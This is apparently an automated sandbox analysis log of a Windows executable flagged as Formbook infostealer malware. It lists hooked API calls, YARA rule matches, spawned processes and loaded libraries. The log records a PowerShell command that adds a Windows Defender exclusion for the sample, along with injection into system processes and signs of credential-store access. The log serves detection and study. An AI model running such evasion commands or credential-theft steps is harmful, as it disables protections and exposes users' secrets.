            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772BF0 NtAllocateVirtualMemory,5_2_05772BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772BE0 NtQueryValueKey,5_2_05772BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772BA0 NtEnumerateValueKey,5_2_05772BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772B80 NtQueryInformationFile,5_2_05772B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772AF0 NtWriteFile,5_2_05772AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772AD0 NtReadFile,5_2_05772AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772AB0 NtWaitForSingleObject,5_2_05772AB0
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E4340 NtSetContextThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E4650 NtSuspendThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E35C0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2B60 NtClose, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2BA0 NtEnumerateValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2BF0 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2BE0 NtQueryValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2AD0 NtReadFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2AF0 NtWriteFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E39B0 NtGetContextThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2F30 NtCreateSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2FB0 NtResumeThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2FE0 NtCreateFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2E80 NtReadVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2EE0 NtQueueApcThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2D10 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2D30 NtUnmapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2DD0 NtDelayExecution, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2DF0 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2C70 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2C60 NtCreateKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2CA0 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_031E2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_02AA7660 NtCreateFile
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_02AA77C0 NtReadFile
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_02AA7A80 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_02AA78A0 NtDeleteFile
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_02AA7930 NtClose
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2060 -s 1572
            Source: NdYuOgHbM9.exe Static PE information: No import functions for PE file found
            Source: NdYuOgHbM9.exe, 00000000.00000000.1607901812.000001EF38C7A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUtedazo8 vs NdYuOgHbM9.exe
            Source: NdYuOgHbM9.exe, 00000000.00000002.1806926879.000001EF53158000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs NdYuOgHbM9.exe
            Source: NdYuOgHbM9.exe Binary or memory string: OriginalFilenameUtedazo8 vs NdYuOgHbM9.exe
            Source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: NdYuOgHbM9.exe, --------.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@17/11@15/14
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2060
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3548:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlbw15ex.j3e.ps1Jump to behavior
            Source: NdYuOgHbM9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: NdYuOgHbM9.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.2023692361.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.2023799863.0000000002D7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: NdYuOgHbM9.exeReversingLabs: Detection: 42%
            Source: NdYuOgHbM9.exeVirustotal: Detection: 39%
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeFile read: C:\Users\user\Desktop\NdYuOgHbM9.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\NdYuOgHbM9.exe "C:\Users\user\Desktop\NdYuOgHbM9.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2060 -s 1572
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"Jump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
